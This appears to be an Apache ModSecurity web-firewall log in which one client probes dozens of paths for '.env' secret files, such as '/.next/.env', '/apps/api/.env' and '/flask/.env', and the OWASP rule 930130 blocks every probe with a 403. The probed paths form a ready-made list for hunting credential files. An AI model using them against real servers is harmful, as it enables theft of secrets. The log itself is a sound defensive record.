[Mon May 11 22:02:03.113876 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:59426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.next/.env"] [unique_id "agI1u3EgAO_835W6c1mN1AAAAFQ"]
[Mon May 11 22:02:03.114026 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:59426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.next/.env"] [unique_id "agI1u3EgAO_835W6c1mN1AAAAFQ"]
[Mon May 11 22:02:03.114443 2026] [security2:error] [pid 1605480:tid 1605522] [client 193.111.117.35:59438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/netlify/functions/.env"] [unique_id "agI1ux2Cvzd_nyNfUm_2bQAAAQA"]
[Mon May 11 22:02:03.114586 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:59428] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lambda/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/lambda/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtJwAAAUg"]
[Mon May 11 22:02:03.114693 2026] [security2:error] [pid 1605480:tid 1605522] [client 193.111.117.35:59438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/netlify/functions/.env"] [unique_id "agI1ux2Cvzd_nyNfUm_2bQAAAQA"]
[Mon May 11 22:02:03.114768 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:59426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u3EgAO_835W6c1mN1AAAAFQ"]
[Mon May 11 22:02:03.114810 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:59428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/lambda/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtJwAAAUg"]
[Mon May 11 22:02:03.114919 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:59474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtJgAAAUc"]
[Mon May 11 22:02:03.115332 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:59400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agI1u6FW67LJTsgN3jQEjAAAABc"]
[Mon May 11 22:02:03.115465 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:59416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.next/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.next/.env.local"] [unique_id "agI1u9eaRXe5lR8y0ZOtKAAAAVM"]
[Mon May 11 22:02:03.115479 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:59400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agI1u6FW67LJTsgN3jQEjAAAABc"]
[Mon May 11 22:02:03.115617 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:59416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.next/.env.local"] [unique_id "agI1u9eaRXe5lR8y0ZOtKAAAAVM"]
[Mon May 11 22:02:03.115665 2026] [security2:error] [pid 1605480:tid 1605522] [client 193.111.117.35:59438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ux2Cvzd_nyNfUm_2bQAAAQA"]
[Mon May 11 22:02:03.115908 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:59428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtJwAAAUg"]
[Mon May 11 22:02:03.116178 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:59400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u6FW67LJTsgN3jQEjAAAABc"]
[Mon May 11 22:02:03.116389 2026] [security2:error] [pid 1534836:tid 1534890] [client 193.111.117.35:59416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtKAAAAVM"]
[Mon May 11 22:02:03.125003 2026] [security2:error] [pid 1534836:tid 1534875] [client 193.111.117.35:59516] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/apps/api/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtKgAAAUQ"]
[Mon May 11 22:02:03.125165 2026] [security2:error] [pid 1534836:tid 1534875] [client 193.111.117.35:59516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/apps/api/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtKgAAAUQ"]
[Mon May 11 22:02:03.125584 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:59506] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /packages/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/packages/api/.env"] [unique_id "agI1u6FW67LJTsgN3jQEjgAAAAk"]
[Mon May 11 22:02:03.125729 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:59506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/packages/api/.env"] [unique_id "agI1u6FW67LJTsgN3jQEjgAAAAk"]
[Mon May 11 22:02:03.126356 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:59506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u6FW67LJTsgN3jQEjgAAAAk"]
[Mon May 11 22:02:03.128087 2026] [security2:error] [pid 1534836:tid 1534875] [client 193.111.117.35:59516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtKgAAAUQ"]
[Mon May 11 22:02:03.134318 2026] [security2:error] [pid 1601130:tid 1601161] [client 193.111.117.35:59490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/apps/backend/.env"] [unique_id "agI1u3EgAO_835W6c1mN2AAAAEs"]
[Mon May 11 22:02:03.134492 2026] [security2:error] [pid 1601130:tid 1601161] [client 193.111.117.35:59490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/apps/backend/.env"] [unique_id "agI1u3EgAO_835W6c1mN2AAAAEs"]
[Mon May 11 22:02:03.135287 2026] [security2:error] [pid 1601130:tid 1601161] [client 193.111.117.35:59490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u3EgAO_835W6c1mN2AAAAEs"]
[Mon May 11 22:02:03.179906 2026] [security2:error] [pid 1605480:tid 1605526] [client 193.111.117.35:59570] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.override"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.override"] [unique_id "agI1ux2Cvzd_nyNfUm_2cQAAAQQ"]
[Mon May 11 22:02:03.179906 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:59522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/services/api/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtKwAAAUU"]
[Mon May 11 22:02:03.179916 2026] [security2:error] [pid 1590352:tid 1590393] [client 193.111.117.35:59536] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.nuxt/.env"] [unique_id "agI1u61q0G_aXAqWauTydQAAAIE"]
[Mon May 11 22:02:03.180115 2026] [security2:error] [pid 1605480:tid 1605526] [client 193.111.117.35:59570] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.override"] [unique_id "agI1ux2Cvzd_nyNfUm_2cQAAAQQ"]
[Mon May 11 22:02:03.180115 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:59522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/services/api/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtKwAAAUU"]
[Mon May 11 22:02:03.180118 2026] [security2:error] [pid 1590352:tid 1590393] [client 193.111.117.35:59536] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.nuxt/.env"] [unique_id "agI1u61q0G_aXAqWauTydQAAAIE"]
[Mon May 11 22:02:03.180777 2026] [security2:error] [pid 1605480:tid 1605526] [client 193.111.117.35:59570] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ux2Cvzd_nyNfUm_2cQAAAQQ"]
[Mon May 11 22:02:03.180957 2026] [security2:error] [pid 1590352:tid 1590393] [client 193.111.117.35:59536] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u61q0G_aXAqWauTydQAAAIE"]
[Mon May 11 22:02:03.181829 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:59522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtKwAAAUU"]
[Mon May 11 22:02:03.182746 2026] [security2:error] [pid 1601130:tid 1601173] [client 193.111.117.35:59586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /envs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/envs/.env"] [unique_id "agI1u3EgAO_835W6c1mN2QAAAFc"]
[Mon May 11 22:02:03.182910 2026] [security2:error] [pid 1601130:tid 1601173] [client 193.111.117.35:59586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/envs/.env"] [unique_id "agI1u3EgAO_835W6c1mN2QAAAFc"]
[Mon May 11 22:02:03.183536 2026] [security2:error] [pid 1601130:tid 1601173] [client 193.111.117.35:59586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u3EgAO_835W6c1mN2QAAAFc"]
[Mon May 11 22:02:03.205285 2026] [security2:error] [pid 1534836:tid 1534880] [client 193.111.117.35:59614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /flask/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/flask/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLAAAAUk"]
[Mon May 11 22:02:03.205440 2026] [security2:error] [pid 1534836:tid 1534880] [client 193.111.117.35:59614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/flask/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLAAAAUk"]
[Mon May 11 22:02:03.206334 2026] [security2:error] [pid 1534836:tid 1534880] [client 193.111.117.35:59614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtLAAAAUk"]
